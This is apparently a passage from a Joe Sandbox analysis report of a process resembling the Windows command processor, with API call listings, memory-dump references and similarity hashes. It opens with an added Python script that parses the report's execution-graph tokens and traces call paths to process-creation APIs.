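The execution_graph text is the token stream behind Joe Sandbox's interactive graph, which is awkward to read once a few hundred nodes are involved. As an added example (not Joe Sandbox code; the token grammar is inferred from this page's dump and is an assumption), the Python below parses that stream into nodes and edges, indexes which addresses call which API, and walks from every graph root to the first node that calls a given API. The embedded sample is a subset of the node and edge tokens from the dump above, reordered so the chain from 7ff6eb176be0 to the process-creation nodes reads top to bottom; the function names are this example's own.

```python
"""Parse a Joe Sandbox 'execution_graph' token dump and trace API call paths.

Added example, not Joe Sandbox code. Assumed grammar (inferred from the dump):
"<id> <address> [API ...]" declares a node, "<src>-><dst>" an edge, and
"<n> API calls" after a node marks a collapsed subgraph with n calls.
"""
from collections import deque

# Constructed sample: a subset of this page's node/edge tokens, reordered so
# the chain reads top to bottom. No edge was added; 7ff6eb18441a has no
# incoming edge here because the page dump has none either.
SAMPLE = """
execution_graph 20722 7ff6eb176be0 20723 7ff6eb17cd90 166 API calls 20722->20723
20724 7ff6eb176c04 20723->20724 20726 7ff6eb176c13 _pipe 20724->20726
20729 7ff6eb176c32 20726->20729 20773 7ff6eb17affc _dup 20729->20773
20774 7ff6eb17b018 20773->20774 20735 7ff6eb176c7d 20774->20735
20739 7ff6eb17b038 _dup2 20735->20739 20741 7ff6eb176c93 20739->20741
20743 7ff6eb17d208 _close 20741->20743 20745 7ff6eb176ca4 20743->20745
20775 7ff6eb17be00 20745->20775 20776 7ff6eb17be1b 20775->20776
20777 7ff6eb17be67 20776->20777 20782 7ff6eb17bf29 20777->20782
20783 7ff6eb17cd90 166 API calls 20782->20783 20784 7ff6eb17bf33 20783->20784
20791 7ff6eb17bf70 20784->20791 20803 7ff6eb17bf75 20791->20803
20805 7ff6eb17b0d8 194 API calls 20803->20805 20806 7ff6eb17bf7f 20805->20806
20856 7ff6eb185ad8 20806->20856 20857 7ff6eb17cd90 166 API calls 20856->20857
20858 7ff6eb185b12 20857->20858 20859 7ff6eb17cb40 166 API calls 20858->20859
20861 7ff6eb185b26 20859->20861 20863 7ff6eb180a6c 273 API calls 20861->20863
20864 7ff6eb185b43 20863->20864 20866 7ff6eb185b48 GetConsoleTitleW 20864->20866
20869 7ff6eb17cad4 172 API calls 20866->20869 20872 7ff6eb185b66 20869->20872
21005 7ff6eb184224 InitializeProcThreadAttributeList 20872->21005
21006 7ff6eb1842ab UpdateProcThreadAttribute 21005->21006
21009 7ff6eb1842eb memset memset GetStartupInfoW 21006->21009
21024 7ff6eb18441a 21026 7ff6eb18442a CreateProcessW 21024->21026
21028 7ff6eb184596 CreateProcessAsUserW 21024->21028
"""


def parse_execution_graph(text):
    """Return (nodes, edges); nodes maps id -> {"addr", "apis", "api_calls"}."""
    tokens = text.split()
    nodes, edges, current, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        if "->" in tok:                                   # edge "src->dst"
            src, dst = tok.split("->", 1)
            edges.append((int(src), int(dst)))
            i += 1
        elif tok.isdigit():
            if tokens[i + 1:i + 3] == ["API", "calls"]:   # collapsed subgraph
                nodes[current]["api_calls"] = int(tok)
                i += 3
            else:                                         # new node: id, address
                current = int(tok)
                addr = tokens[i + 1] if i + 1 < len(tokens) else ""
                nodes[current] = {"addr": addr, "apis": [], "api_calls": None}
                i += 2
        else:                                             # API name for current node
            if current is not None:                       # skips the leading label
                nodes[current]["apis"].append(tok)
            i += 1
    return nodes, edges


def addr_of(nodes, nid):
    """Address of a node, or a placeholder for ids only referenced by edges."""
    return nodes[nid]["addr"] if nid in nodes else "#%d" % nid


def api_index(nodes):
    """Map each API name to the addresses of the nodes that call it."""
    index = {}
    for info in nodes.values():
        for api in info["apis"]:
            index.setdefault(api, []).append(info["addr"])
    return index


def paths_to_api(nodes, edges, api):
    """Shortest path (as addresses) from each root to the first node calling api."""
    succ, has_pred = {}, set()
    for src, dst in edges:
        succ.setdefault(src, []).append(dst)
        has_pred.add(dst)
    targets = {nid for nid, info in nodes.items() if api in info["apis"]}
    found = {}
    for root in (nid for nid in nodes if nid not in has_pred):  # BFS per root
        prev, queue = {root: None}, deque([root])
        while queue:
            node = queue.popleft()
            if node in targets:
                path = []
                while node is not None:
                    path.append(node)
                    node = prev[node]
                found[nodes[root]["addr"]] = [addr_of(nodes, n) for n in reversed(path)]
                break
            for nxt in succ.get(node, []):
                if nxt not in prev:
                    prev[nxt] = node
                    queue.append(nxt)
    return found


if __name__ == "__main__":
    nodes, edges = parse_execution_graph(SAMPLE)
    print("%d nodes, %d edges" % (len(nodes), len(edges)))
    for api in ("InitializeProcThreadAttributeList", "CreateProcessW"):
        for root, path in paths_to_api(nodes, edges, api).items():
            print("%s: %s -> ... -> %s (%d nodes)" % (api, root, path[-1], len(path)))
```

Running the block on the sample shows the two facts the raw token list hides: the redirection root 7ff6eb176be0 reaches InitializeProcThreadAttributeList in 33 nodes, while CreateProcessW is only reachable from the isolated root 7ff6eb18441a, because the page's dump carries no edge into it.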
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
• Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: _wcsicmpwcschrwcsrchr$CurrentDirectoryNeedPath_wcsnicmpmemset
                                              • String ID: .BAT$.CMD$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$PATH$PATHEXT$cmd
                                              • API String ID: 3305344409-4288247545
                                              • Opcode ID: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                              • Instruction ID: b3710c31083e347f1a9af0162cfae7917129b6058f80b41ba211ac143c5603fd
                                              • Opcode Fuzzy Hash: 32027d78a79c69abf99783d1267dc340374f751313a3c2012563c12dbbf382bc
                                              • Instruction Fuzzy Hash: 1942A123A0878285EA609B2198543F967A1BF8DBB8F544135DD1ECB7F4DF3EE544830A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
[Control-flow graph of the function at 7ff6eb17aa54; basic-block edge data not reproduced.]
                                              Memory Dump Source
• Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
• Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: wcschr$Heap$AllocateProcessiswspacememsettowlowerwcsrchr
                                              • String ID: :$:$:$:ON$OFF
                                              • API String ID: 4076514806-467788257
                                              • Opcode ID: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                              • Instruction ID: 75b9f229bde4634299c95518699a16c7a41f6f7e85fd7f5e5896d244e9524426
                                              • Opcode Fuzzy Hash: 4f886329839ce9d73f83e73040c14b409f6776bafd90df2433360a667a1c5ce6
                                              • Instruction Fuzzy Hash: CB22B223A0865286EB249F21D9543F96691FF4EBA8F488035D90EC77F4DF7FA444834A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
[Control-flow graph of the function at 7ff6eb1851ec; basic-block edge data not reproduced.]
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: InfoLocale$DefaultLangUsersetlocale
                                              • String ID: .OCP$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed$dd/MM/yy$yy/MM/dd
                                              • API String ID: 2492766124-2236139042
                                              • Opcode ID: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                              • Instruction ID: 9f93d3cdaa0d04ac4e673c104713fbf802711c6e3949f2bbf838eeefe345b540
                                              • Opcode Fuzzy Hash: 2a4578c534326ca189a6d67b8d7d5f73ffb3ac0fc7df7dd3f0f26b29881ec2ab
                                              • Instruction Fuzzy Hash: 6DF14926B0868285EB118F11E5503F967A5FF0CBA8F944135CA4D977B4EF3EE909C70A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
[Control-flow graph of the function at 7ff6eb184224; basic-block edge data not reproduced.]
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: AttributeProcThread$List$CloseCreateDeleteErrorHandleLastProcessmemsetwcsrchr$InfoInitializeStartupUpdateUser_local_unwind_wcsnicmplstrcmp
                                              • String ID: %01C$%08X$=ExitCode$=ExitCodeAscii$COPYCMD$\XCOPY.EXE$h
                                              • API String ID: 388421343-2905461000
                                              • Opcode ID: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                              • Instruction ID: 4ad3f9c0ac13b110fd7e09abc6a3adad261ad1423e8593938282a54c16109952
                                              • Opcode Fuzzy Hash: a39f4a529f52f64395c69d74f8e47fafd60531de1d64f261e5ad8184ef12a4c8
                                              • Instruction Fuzzy Hash: 2CF13B33A18B8286EA608B11E4547FAB7A5FB8D7A8F504135D94D83774DF3EE444CB0A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
[Control-flow graph of the function at 7ff6eb185554; basic-block edge data not reproduced.]
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryValue$CloseOpensrandtime
                                              • String ID: AutoRun$CompletionChar$DefaultColor$DelayedExpansion$DisableUNCCheck$EnableExtensions$PathCompletionChar$Software\Microsoft\Command Processor
                                              • API String ID: 145004033-3846321370
                                              • Opcode ID: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                              • Instruction ID: 804a82e11a3a57b63e2b8e46cdfa143d765c95b8275fbbdf4a37b91cc345e655
                                              • Opcode Fuzzy Hash: 7805ef0751f17a64bc231b327674b43fa69c0befe7df2b1e52c817e25d9d9668
                                              • Instruction Fuzzy Hash: F1E1533351DA82C6E7508B10E4507FAB7A0FB8D768F405535E98E82A78DF7EE548CB06

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
[Control-flow graph of the function at 7ff6eb1837d8; basic-block edge data not reproduced.]
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: QueryThread$ConsoleInfoOpenOutputVirtual$CloseCurrentHeapInformationLocaleValue_setjmpmemset
                                              • String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
                                              • API String ID: 2624720099-1920437939
                                              • Opcode ID: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                              • Instruction ID: 5c9f5a0bed28deaf2e3436219264cc06f65e2a9f46ce897129fd31c0024e6186
                                              • Opcode Fuzzy Hash: f14ccfe17658d03b7f0c6aedd8572f1845147b0a0877a5eeff18d3955b8dfa43
                                              • Instruction Fuzzy Hash: DBC1CE33E086428AF7149B64A4403F9AAA0FF4E77CF544138DA0ED67B5DF3EA045870A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
[Control-flow graph of the function at 7ff6eb18823c; basic-block edge data not reproduced.]
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ErrorFileFindFirstLast

                                              Control-flow Graph


                                              Control-flow Graph

                                              APIs
                                              • InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184D9A
                                                • Part of subcall function 00007FF6EB1858E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF6EB19C6DB), ref: 00007FF6EB1858EF
                                              • SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184DBB
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB184DCA
                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184DE0
                                              • _get_osfhandle.MSVCRT ref: 00007FF6EB184DEE
                                              • GetConsoleMode.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E04
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB180589
                                                • Part of subcall function 00007FF6EB180580: SetConsoleMode.KERNELBASE ref: 00007FF6EB18059E
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB1805AF
                                                • Part of subcall function 00007FF6EB180580: GetConsoleMode.KERNELBASE ref: 00007FF6EB1805C5
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB1805EF
                                                • Part of subcall function 00007FF6EB180580: GetConsoleMode.KERNELBASE ref: 00007FF6EB180605
                                                • Part of subcall function 00007FF6EB180580: _get_osfhandle.MSVCRT ref: 00007FF6EB180632
                                                • Part of subcall function 00007FF6EB180580: SetConsoleMode.KERNELBASE ref: 00007FF6EB180647
                                                • Part of subcall function 00007FF6EB184A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                                • Part of subcall function 00007FF6EB184A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                                • Part of subcall function 00007FF6EB184A14: RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                                • Part of subcall function 00007FF6EB184A14: memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                                • Part of subcall function 00007FF6EB184A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                                • Part of subcall function 00007FF6EB184AD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AD6
                                                • Part of subcall function 00007FF6EB184AD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6EB178798), ref: 00007FF6EB184AEF
                                                • Part of subcall function 00007FF6EB185554: RegOpenKeyExW.KERNELBASE(?,00000000,?,00000001,?,00007FF6EB184E35), ref: 00007FF6EB1855DA
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185623
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185667
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB1856BE
                                                • Part of subcall function 00007FF6EB185554: RegQueryValueExW.KERNELBASE ref: 00007FF6EB185702
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E35
                                              • GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184E81
                                              • GetWindowsDirectoryW.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184F69
                                              • GetConsoleOutputCP.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184F95
                                              • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FB0
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FC1
                                              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FD8
                                              • GetConsoleTitleW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB184FF8
                                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185037
                                              • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18504B
                                              • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB1850DF
                                              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB1850F2
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18510F
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185130
                                              • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB18514A
                                              • free.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF6EB185175
                                                • Part of subcall function 00007FF6EB183578: _get_osfhandle.MSVCRT ref: 00007FF6EB183584
                                                • Part of subcall function 00007FF6EB183578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB18359C
                                                • Part of subcall function 00007FF6EB183578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835C3
                                                • Part of subcall function 00007FF6EB183578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835D9
                                                • Part of subcall function 00007FF6EB183578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB1835ED
                                                • Part of subcall function 00007FF6EB183578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6EB1732E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6EB183602
                                              Similarity
                                              • API ID: Console$Mode_get_osfhandle$Heap$QueryValue$AddressHandleProcProcess$AllocCommandCriticalEnvironmentFreeInfoLineLockSectionSharedStrings$AcquireAllocateBufferCtrlDirectoryEnterFileGlobalHandlerInitializeModuleOpenOutputReleaseScreenTitleTypeWindowsfreememmove
                                              • String ID: CopyFileExW$IsDebuggerPresent$KERNEL32.DLL$SetConsoleInputExeNameW

                                              Control-flow Graph

                                              Similarity
                                              • API ID: _local_unwind$AttributesCurrentDirectoryErrorFileLasttowupper$FullNamePathiswalphamemset
                                              • String ID: :

                                              Control-flow Graph

                                              Similarity
                                              • API ID: memset$EnvironmentFileModuleNameVariable_wcsuprwcschr
                                              • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE

                                              Control-flow Graph

                                              Similarity
                                              • API ID: ConsoleMode_get_osfhandle
                                              • String ID: CMD.EXE

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: ConsoleTitlewcschr
                                              • String ID: /$:
                                              • API String ID: 2364928044-4222935259
                                              • Opcode ID: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                              • Instruction ID: 703023586abbfd6ef03f8b7b566fa68959eb08e141c276bcfd451d7eb1c1ea26
                                              • Opcode Fuzzy Hash: 2d0f60311dbb7cb4575a21d0706b761dc6d692f27382b916cf53a40b82970273
                                              • Instruction Fuzzy Hash: 55C1DF63A0865281EB549B25D4143F963A1FF8ABB8F548131D91EC32F5DFBEE444C70A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: CurrentImageNonwritableSleep_amsg_exit_cexit_inittermexit
                                              • String ID:
                                              • API String ID: 4291973834-0
                                              • Opcode ID: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                              • Instruction ID: 76bf44009fe9e2fb4cc2733bea975e69954c37ffccd4f1ba3cfff9aa3c8e56b4
                                              • Opcode Fuzzy Hash: 1c7d4f9672c25dc89753b58092f3baa3c71a1f277e4bfd9c8df4ae4aed7312e4
                                              • Instruction Fuzzy Hash: 1141D433A08A4286FA519B14E9403F962A1BF5C3ACF144436D95DD76B0DF7EF8488B4A

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: memset$DriveErrorInformationLastTypeVolume
                                              • String ID:
                                              • API String ID: 850181435-0
                                              • Opcode ID: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                              • Instruction ID: 8e3b18f6e5c41660923f9c67f205080ebb5a76db68c77cff41229934961a647d
                                              • Opcode Fuzzy Hash: 1c8e67db695c6f6d23b7c0e3cb32e635de602e3492999dee0d50d7fe40b8053d
                                              • Instruction Fuzzy Hash: 9D418F33608BD1C9E7618F21E8443E977A4FB8DB58F444125DA4D8BBA8CF3AD649C705

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              APIs
                                              • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A28
                                              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A66
                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A7D
                                              • memmove.MSVCRT(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184A9A
                                              • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6EB1849F1), ref: 00007FF6EB184AA2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1AD000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1B1000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1BF000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002252988.00007FF6EB1C4000.00000004.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002357574.00007FF6EB1C9000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_7ff6eb170000_alpha.jbxd
                                              Similarity
                                              • API ID: EnvironmentHeapStrings$AllocateFreeProcessmemmove
                                              • String ID:
                                              • API String ID: 647542462-0
                                              • Opcode ID: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                              • Instruction ID: ad2bcc90e8e790f2d32cf5a61511d648a10f10c70b0c068c2a0bee35ec17fb20
                                              • Opcode Fuzzy Hash: 1c74cb7d747f94bb3f8ccfe64acdf6d421a13f5ebefc0e59dd75b6ffc5c77824
                                              • Instruction Fuzzy Hash: 9D11C123A1474282DE109B42B0042B9BBA0FB8DFA8F598038DE0F47764DF3EE4448744
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2002167901.00007FF6EB171000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6EB170000, based on PE: true
                                              • Associated: 00000006.00000002.2002146737.00007FF6EB170000.00000002.00000001.01000000.00000004.sdmp
                                              • Associated: 00000006.00000002.2002191576.00007FF6EB1A2000.00000002.00000001.01000000.00000004.sdmp
